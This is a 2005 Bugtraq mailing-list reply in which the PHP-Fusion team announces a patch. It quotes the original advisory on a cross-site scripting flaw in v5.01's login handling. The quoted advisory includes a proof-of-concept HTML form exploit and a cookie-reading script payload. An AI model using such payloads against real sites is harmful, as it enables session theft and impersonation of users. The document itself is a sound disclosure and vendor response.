Re: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
In-Reply-To: <20050319082025.28662.qmail@xxxxxxxxxxxxxxxxxxxxx>
The main developer Digitanium was notified, a patch has been developed and
released on the main website.
Quote from Main Developer Digitanium at http://www.php-fusion.co.uk
Pi3cH has reported a cross-site-scripting vulnerability. PHP-Fusion does not
properly validate user-supplied input passed by the log-in form in
'user_info_panel.php'.
A remote user can access the target user's cookies (including authentication
cookies), if any, associated with the site running the PHP-Fusion software,
access data recently submitted by the target user via web form to the site, or
take actions on the site acting as the target user. It's believed this is
related to the new login system I plan to implement officially in v5.02, but
have made available as a mod for v5.01. The details are not exact so I have
added a security fix to v5.01 to close this vulnerability. I know this is must
be annoying for everyone, especially as this is the 3rd security issue inside a
month.
You must ensure that you update the file fusion_core.php, you can get the very
latest file from the service pack which is available from the downloads area.
The sourceforge files have also been updated. If you prefer to update manually
please click Read More for details. Thanks to Pi3cH for the heads up.
End quote
Regards
Sheldon King
PHP Fusion Beta Team
>Received: (qmail 6620 invoked from network); 19 Mar 2005 18:05:19 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com)
>(205.206.231.27)
> by mail.securityfocus.com with SMTP; 19 Mar 2005 18:05:19 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com
>[205.206.231.20])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 7C19E237330; Sat, 19 Mar 2005 10:49:48 -0700 (MST)
>Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
>List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
>List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
>Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
>Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 3178 invoked from network); 19 Mar 2005 01:01:33 -0000
>Date: 19 Mar 2005 08:20:25 -0000
>Message-ID: <20050319082025.28662.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: PersianHacker Team <pi3ch@xxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection
> Vulnerability
>
>
>
>[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
>Date: 2005 March
>Bug Number: 10
>
>PHP-Fusion
>a light-weight open-source content management system (CMS) written in PHP. It
>utilises a mySQL database to store your site content and includes a simple,
>comprehensive adminstration system. PHP-Fusion includes the most common
>features you would expect to see in many other CMS packages
>More info @:
>http://php-fusion.co.uk/
>
>
>Discussion:
>--------------------
>The software does not properly validate user-supplied input in 'setuser.php'.
>
>A remote user can access the target user's cookies (including authentication
>cookies),
>if any, associated with the site running the PHP-Fusion software, access data
>recently submitted by the target user via web form to the site, or take actions
>on the site acting as the target user.
>
>
>Exploit:
>--------------------
><html>
>
><head>
><title>PHP-Fusion v5.01 Exploit</title>
></head>
>
><body>
>
><h1>PHP-Fusion v5.01 Html Injection Exploit</h1>
>
>
><form method="POST" action="http://www.example.com/setuser.php">
> <b>XSS in register.php:</b><p>
> Username:
> <input type="text" name="user_name" size="48" value="XSS Injection Code"></p>
> <p>
> Password:
> <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p>
> <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
> exmple: <script>document.write(document.cookie)</script></p>
> <p> <input type='submit' name='login' value='RUN!' class='button'></p>
></form>
><p> </p>
><p align="center"><a
>href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
>
></body>
>
></html>
>
>
>Solution:
>--------------------
>No solution was available at the time of this entry.
>
>
>Credit:
>--------------------
>Discovered by PersianHacker.NET Security Team
>by Pi3cH (pi3ch persianhacker net)
>http://www.PersianHacker.NET
>
>Special Thanks: devil_box(for xss article), amectris, herbod.
>
>
>Help
>--------------------
>visit: http://www.PersianHacker.NET
>or mail me @: pi3ch persianhacker net
>